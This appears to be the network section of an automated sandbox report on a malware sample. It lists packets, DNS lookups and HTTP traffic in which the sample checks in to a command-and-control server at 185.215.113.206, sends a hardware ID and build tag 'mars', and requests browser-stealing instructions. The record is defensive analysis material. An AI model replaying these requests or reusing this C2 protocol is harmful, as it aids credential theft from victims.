                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:54.169715881 CET4990180192.168.2.5185.215.113.16
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:54.170598030 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:54.170726061 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:54.170747042 CET4990180192.168.2.5185.215.113.16
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:54.170814991 CET4990180192.168.2.5185.215.113.16
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:54.171669960 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:54.171747923 CET4990180192.168.2.5185.215.113.16
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:54.171768904 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:54.171921015 CET4990180192.168.2.5185.215.113.16
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:54.172723055 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:54.172847033 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:54.172853947 CET4990180192.168.2.5185.215.113.16
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:54.172985077 CET4990180192.168.2.5185.215.113.16
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:54.173832893 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:54.173929930 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:54.173963070 CET4990180192.168.2.5185.215.113.16
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:54.174032927 CET4990180192.168.2.5185.215.113.16
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:54.174904108 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:54.175014019 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:54.175044060 CET4990180192.168.2.5185.215.113.16
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:54.175172091 CET4990180192.168.2.5185.215.113.16
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:54.175970078 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:54.176085949 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:54.176106930 CET4990180192.168.2.5185.215.113.16
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:54.176213980 CET4990180192.168.2.5185.215.113.16
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:54.177074909 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:54.177160025 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:54.177186012 CET4990180192.168.2.5185.215.113.16
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:54.177226067 CET4990180192.168.2.5185.215.113.16
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:54.178129911 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:54.178251028 CET8049901185.215.113.16192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:54.178251028 CET4990180192.168.2.5185.215.113.16
                                                                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:17.474905014 CET192.168.2.51.1.1.10x3d2cStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:17.475078106 CET192.168.2.51.1.1.10x4d73Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:23.415981054 CET192.168.2.51.1.1.10x59e2Standard query (0)apis.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:23.415982008 CET192.168.2.51.1.1.10xa02eStandard query (0)apis.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:24.405549049 CET192.168.2.51.1.1.10xecebStandard query (0)play.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:24.405817032 CET192.168.2.51.1.1.10x4f13Standard query (0)play.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:28.857893944 CET192.168.2.51.1.1.10x5856Standard query (0)ntp.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:28.858342886 CET192.168.2.51.1.1.10xaaf6Standard query (0)ntp.msn.com65IN (0x0001)false
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:31.613437891 CET192.168.2.51.1.1.10x81dfStandard query (0)bzib.nelreports.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:31.614809990 CET192.168.2.51.1.1.10xc552Standard query (0)bzib.nelreports.net65IN (0x0001)false
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:31.815176010 CET192.168.2.51.1.1.10xa5bcStandard query (0)clients2.googleusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:31.815524101 CET192.168.2.51.1.1.10xa65aStandard query (0)clients2.googleusercontent.com65IN (0x0001)false
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:33.081202984 CET192.168.2.51.1.1.10x2052Standard query (0)sb.scorecardresearch.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:33.081321955 CET192.168.2.51.1.1.10xec33Standard query (0)sb.scorecardresearch.com65IN (0x0001)false
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:33.092865944 CET192.168.2.51.1.1.10xa7f6Standard query (0)assets.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:33.093028069 CET192.168.2.51.1.1.10xd4ccStandard query (0)assets.msn.com65IN (0x0001)false
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:33.195184946 CET192.168.2.51.1.1.10x7583Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:33.195350885 CET192.168.2.51.1.1.10x381aStandard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:33.195686102 CET192.168.2.51.1.1.10xd13dStandard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:33.196068048 CET192.168.2.51.1.1.10x69c5Standard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:33.215548992 CET192.168.2.51.1.1.10x6b40Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:33.216253996 CET192.168.2.51.1.1.10x4067Standard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:33.310620070 CET192.168.2.51.1.1.10xc453Standard query (0)c.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:33.310882092 CET192.168.2.51.1.1.10xcdbfStandard query (0)c.msn.com65IN (0x0001)false
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:33.402555943 CET192.168.2.51.1.1.10x8995Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:33.402985096 CET192.168.2.51.1.1.10x1e04Standard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:33.407449961 CET192.168.2.51.1.1.10x5f9cStandard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:33.407577991 CET192.168.2.51.1.1.10xdf7aStandard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:33.408467054 CET192.168.2.51.1.1.10xddd1Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:33.408623934 CET192.168.2.51.1.1.10x4c0aStandard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:33.542655945 CET192.168.2.51.1.1.10xd4e0Standard query (0)api.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:33.542896032 CET192.168.2.51.1.1.10x8e34Standard query (0)api.msn.com65IN (0x0001)false
                                                                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:17.704055071 CET1.1.1.1192.168.2.50x3d2cNo error (0)www.google.com142.250.185.228A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:17.704303980 CET1.1.1.1192.168.2.50x4d73No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:23.643141031 CET1.1.1.1192.168.2.50x59e2No error (0)apis.google.complus.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:23.643141031 CET1.1.1.1192.168.2.50x59e2No error (0)plus.l.google.com142.250.185.206A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:23.643512964 CET1.1.1.1192.168.2.50xa02eNo error (0)apis.google.complus.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:24.631237984 CET1.1.1.1192.168.2.50xecebNo error (0)play.google.com142.250.186.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:29.083648920 CET1.1.1.1192.168.2.50x5856No error (0)ntp.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:29.084250927 CET1.1.1.1192.168.2.50xaaf6No error (0)ntp.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:29.142185926 CET1.1.1.1192.168.2.50xc66fNo error (0)bingadsedgeextension-prod-europe.azurewebsites.netssl.bingadsedgeextension-prod-europe.azurewebsites.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:29.142185926 CET1.1.1.1192.168.2.50xc66fNo error (0)ssl.bingadsedgeextension-prod-europe.azurewebsites.net94.245.104.56A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:29.142380953 CET1.1.1.1192.168.2.50xb8e7No error (0)bingadsedgeextension-prod-europe.azurewebsites.netssl.bingadsedgeextension-prod-europe.azurewebsites.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:31.840780973 CET1.1.1.1192.168.2.50x81dfNo error (0)bzib.nelreports.netbzib.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:31.842381954 CET1.1.1.1192.168.2.50xc552No error (0)bzib.nelreports.netbzib.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:32.042152882 CET1.1.1.1192.168.2.50xa5bcNo error (0)clients2.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:32.042152882 CET1.1.1.1192.168.2.50xa5bcNo error (0)googlehosted.l.googleusercontent.com172.217.18.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:32.043068886 CET1.1.1.1192.168.2.50xa65aNo error (0)clients2.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:33.308907032 CET1.1.1.1192.168.2.50x2052No error (0)sb.scorecardresearch.com13.32.99.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:33.308907032 CET1.1.1.1192.168.2.50x2052No error (0)sb.scorecardresearch.com13.32.99.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:33.308907032 CET1.1.1.1192.168.2.50x2052No error (0)sb.scorecardresearch.com13.32.99.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:33.308907032 CET1.1.1.1192.168.2.50x2052No error (0)sb.scorecardresearch.com13.32.99.90A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:33.319916010 CET1.1.1.1192.168.2.50xd4ccNo error (0)assets.msn.comassets.msn.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:33.319991112 CET1.1.1.1192.168.2.50xa7f6No error (0)assets.msn.comassets.msn.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:33.422466993 CET1.1.1.1192.168.2.50x381aNo error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:33.422537088 CET1.1.1.1192.168.2.50x7583No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:33.422537088 CET1.1.1.1192.168.2.50x7583No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:33.423075914 CET1.1.1.1192.168.2.50xd13dNo error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:33.423075914 CET1.1.1.1192.168.2.50xd13dNo error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:33.423105955 CET1.1.1.1192.168.2.50x69c5No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:33.442640066 CET1.1.1.1192.168.2.50x6b40No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:33.442640066 CET1.1.1.1192.168.2.50x6b40No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:33.443419933 CET1.1.1.1192.168.2.50x4067No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:33.538559914 CET1.1.1.1192.168.2.50xc453No error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:33.538611889 CET1.1.1.1192.168.2.50xcdbfNo error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:33.629951954 CET1.1.1.1192.168.2.50x8995No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:33.629951954 CET1.1.1.1192.168.2.50x8995No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:33.630487919 CET1.1.1.1192.168.2.50x1e04No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:33.635198116 CET1.1.1.1192.168.2.50x5f9cNo error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:33.635198116 CET1.1.1.1192.168.2.50x5f9cNo error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:33.635251045 CET1.1.1.1192.168.2.50xdf7aNo error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:33.635499954 CET1.1.1.1192.168.2.50xddd1No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:33.635499954 CET1.1.1.1192.168.2.50xddd1No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:33.635994911 CET1.1.1.1192.168.2.50x4c0aNo error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:33.770148039 CET1.1.1.1192.168.2.50x8e34No error (0)api.msn.comapi-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:33.770375967 CET1.1.1.1192.168.2.50xd4e0No error (0)api.msn.comapi-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:35.677699089 CET1.1.1.1192.168.2.50xbb1dNo error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:35.677699089 CET1.1.1.1192.168.2.50xbb1dNo error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.403455019 CET1.1.1.1192.168.2.50x31e0No error (0)scdn1f005.wpc.ad629.nucdn.netsni1gl.wpc.nucdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.404555082 CET1.1.1.1192.168.2.50xd00dNo error (0)scdn1f005.wpc.ad629.nucdn.netsni1gl.wpc.nucdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.404555082 CET1.1.1.1192.168.2.50xd00dNo error (0)sni1gl.wpc.nucdn.net152.199.21.175A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:38.418689966 CET1.1.1.1192.168.2.50x58aaNo error (0)scdn1f005.wpc.ad629.nucdn.netsni1gl.wpc.nucdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:40.494285107 CET1.1.1.1192.168.2.50x7db7No error (0)scdn1f005.wpc.ad629.nucdn.netsni1gl.wpc.nucdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:40.494285107 CET1.1.1.1192.168.2.50x7db7No error (0)sni1gl.wpc.nucdn.net152.199.21.175A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.464621067 CET1.1.1.1192.168.2.50x7db7No error (0)scdn1f005.wpc.ad629.nucdn.netsni1gl.wpc.nucdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:41.464621067 CET1.1.1.1192.168.2.50x7db7No error (0)sni1gl.wpc.nucdn.net152.199.21.175A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:42.467679977 CET1.1.1.1192.168.2.50x7db7No error (0)scdn1f005.wpc.ad629.nucdn.netsni1gl.wpc.nucdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:42.467679977 CET1.1.1.1192.168.2.50x7db7No error (0)sni1gl.wpc.nucdn.net152.199.21.175A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:44.470633984 CET1.1.1.1192.168.2.50x7db7No error (0)scdn1f005.wpc.ad629.nucdn.netsni1gl.wpc.nucdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:44.470633984 CET1.1.1.1192.168.2.50x7db7No error (0)sni1gl.wpc.nucdn.net152.199.21.175A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:48.480381012 CET1.1.1.1192.168.2.50x7db7No error (0)scdn1f005.wpc.ad629.nucdn.netsni1gl.wpc.nucdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:48.480381012 CET1.1.1.1192.168.2.50x7db7No error (0)sni1gl.wpc.nucdn.net152.199.21.175A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        0192.168.2.549704185.215.113.206805480C:\Users\user\Desktop\E89hSGjVrv.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:08.377001047 CET90OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                        Host: 185.215.113.206
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:09.780477047 CET203INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:09 GMT
                                                                                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                        Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:09.785913944 CET413OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----DGDBKFBAKFBFHIECFBFI
                                                                                                                                                                                                                                                        Host: 185.215.113.206
                                                                                                                                                                                                                                                        Content-Length: 211
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                        Data Raw: 2d 2d 2d 2d 2d 2d 44 47 44 42 4b 46 42 41 4b 46 42 46 48 49 45 43 46 42 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 31 36 32 31 38 33 38 33 44 31 37 31 32 31 35 30 31 38 30 33 31 0d 0a 2d 2d 2d 2d 2d 2d 44 47 44 42 4b 46 42 41 4b 46 42 46 48 49 45 43 46 42 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 44 47 44 42 4b 46 42 41 4b 46 42 46 48 49 45 43 46 42 46 49 2d 2d 0d 0a
                                                                                                                                                                                                                                                        Data Ascii: ------DGDBKFBAKFBFHIECFBFIContent-Disposition: form-data; name="hwid"416218383D171215018031------DGDBKFBAKFBFHIECFBFIContent-Disposition: form-data; name="build"mars------DGDBKFBAKFBFHIECFBFI--
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:10.259154081 CET407INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:10 GMT
                                                                                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                        Content-Length: 180
                                                                                                                                                                                                                                                        Keep-Alive: timeout=5, max=99
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                        Data Raw: 4e 32 59 32 4f 44 67 32 4e 7a 6c 6c 4e 32 5a 6a 4f 57 45 35 4d 32 4d 79 4d 47 45 31 5a 54 59 33 4f 47 45 77 59 54 46 6a 4d 44 49 30 59 6a 67 78 4e 54 64 6c 4e 6d 4a 6b 4f 44 4a 6d 4d 7a 51 30 4d 44 67 34 59 7a 52 6a 4e 54 67 31 4d 7a 6b 77 4e 6a 41 30 59 6a 49 31 4e 47 4e 68 4e 47 4d 7a 66 48 64 72 61 32 70 78 59 57 6c 68 65 47 74 6f 59 6e 78 7a 62 57 70 73 62 47 31 35 62 57 78 69 65 6e 45 75 63 48 64 6b 66 44 42 38 4d 48 77 78 66 44 46 38 4d 58 77 78 66 44 46 38 4d 58 77 77 66 48 6c 69 62 6d 4e 69 61 48 6c 73 5a 58 42 74 5a 58 77 3d
                                                                                                                                                                                                                                                        Data Ascii: N2Y2ODg2NzllN2ZjOWE5M2MyMGE1ZTY3OGEwYTFjMDI0YjgxNTdlNmJkODJmMzQ0MDg4YzRjNTg1MzkwNjA0YjI1NGNhNGMzfHdra2pxYWlheGtoYnxzbWpsbG15bWxienEucHdkfDB8MHwxfDF8MXwxfDF8MXwwfHlibmNiaHlsZXBtZXw=
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:10.260603905 CET470OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----ECFCBFBGDBKJKECAAKKF
                                                                                                                                                                                                                                                        Host: 185.215.113.206
                                                                                                                                                                                                                                                        Content-Length: 268
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                        Data Raw: 2d 2d 2d 2d 2d 2d 45 43 46 43 42 46 42 47 44 42 4b 4a 4b 45 43 41 41 4b 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 66 36 38 38 36 37 39 65 37 66 63 39 61 39 33 63 32 30 61 35 65 36 37 38 61 30 61 31 63 30 32 34 62 38 31 35 37 65 36 62 64 38 32 66 33 34 34 30 38 38 63 34 63 35 38 35 33 39 30 36 30 34 62 32 35 34 63 61 34 63 33 0d 0a 2d 2d 2d 2d 2d 2d 45 43 46 43 42 46 42 47 44 42 4b 4a 4b 45 43 41 41 4b 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 45 43 46 43 42 46 42 47 44 42 4b 4a 4b 45 43 41 41 4b 4b 46 2d 2d 0d 0a
                                                                                                                                                                                                                                                        Data Ascii: ------ECFCBFBGDBKJKECAAKKFContent-Disposition: form-data; name="token"7f688679e7fc9a93c20a5e678a0a1c024b8157e6bd82f344088c4c585390604b254ca4c3------ECFCBFBGDBKJKECAAKKFContent-Disposition: form-data; name="message"browsers------ECFCBFBGDBKJKECAAKKF--
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:10.722989082 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Wed, 20 Nov 2024 23:49:10 GMT
                                                                                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                        Content-Length: 2028
                                                                                                                                                                                                                                                        Keep-Alive: timeout=5, max=98
                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
